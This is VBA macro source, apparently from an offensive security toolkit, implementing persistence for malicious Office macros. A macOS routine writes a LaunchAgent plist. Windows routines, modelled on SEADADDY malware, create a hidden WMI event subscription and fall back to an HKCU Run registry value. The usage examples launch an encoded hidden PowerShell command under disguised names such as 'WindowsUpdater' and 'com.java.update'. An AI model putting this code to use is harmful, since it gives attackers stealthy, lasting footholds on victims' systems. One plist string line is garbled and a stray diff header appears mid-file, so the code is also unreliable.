Sub MacPersistence(ByVal cmd As String, ByVal taskName As String)
Dim plist As String
plist = "<?xml version=""1.0"" encoding=""UTF-8""?>\n"
plist = plist & "<!DOCTYPE plist PUBLIC ""-//Apple Computer//DTD "
plist = plist & "PLIST 1.0//EN"" ""http://www.apple.com/DTDs/plist"
plist = plist & " = plist & PropertyList-1.0.dtd"">\n"
plist = plist & "<plist version=""1.0"">\n
plist = plist & "<dict>\n"
plist = plist & " <key>Label</key>\n"
plist = plist & " <string>" & taskName & "</string>\n"
plist = plist & " <key>ProgramArguments</key>\n"
plist = plist & " <array>\n"
plist = plist & " <string>/bin/bash</string>\n"
plist = plist & " <string>-c</string>\n"
plist = plist & " <string>'" & cmd & "'</string>\n"
plist = plist & " </array>\n"
plist = plist & " <key>RunAtLoad</key>\n"
plist = plist & " <true/>\n"
plist = plist & " <key>KeepAlive</key>\n"
plist = plist & " <true/>\n"
plist = plist & "</dict>\n"
plist = plist & "</plist>\n"
' TODO: File writing does not work at the moment, most likely due to
' apps sandboxing mechanism enforced by the system.
' Approach #1: File write by system command
' system("echo -e """ & plist & """ > ~/Library/LaunchAgents/" & taskName)
' Approach #2: File write by fopen+fputs+fclose
Dim fileName As String
fileName = "~/Library/LaunchAgents/" & taskName & ".plist"
writeToFile fileName, plist
End Sub
Sub TestMacPersistence()
MacPersistence "/Applications/Calculator.app/Contents/MacOS/Calculator", "com.java.update"
End Sub


@ -0,0 +1,105 @@
'
' SYNOPSIS:
' This macro implements two windows persistence methods:
' - WMI Event Filter object creation
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
'
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WindowsPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.Name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.Query = Query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.Name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
Public Function RegistryPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
On Error GoTo Failed
Const HKEY_CURRENT_USER = &H80000001
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strComputer = "."
Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strValueName = taskName
strValue = exePath
objReg.SetExpandedStringValue HKEY_CURRENT_USER, strKeyPath, strValueName, strValue
RegistryPersistence = True
Exit Function
Failed:
RegistryPersistence = False
End Function
Public Function WindowsPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
If WMIPersistence(exePath, taskName) <> True Then
RegistryPersistence exePath, taskName
End If
End Function

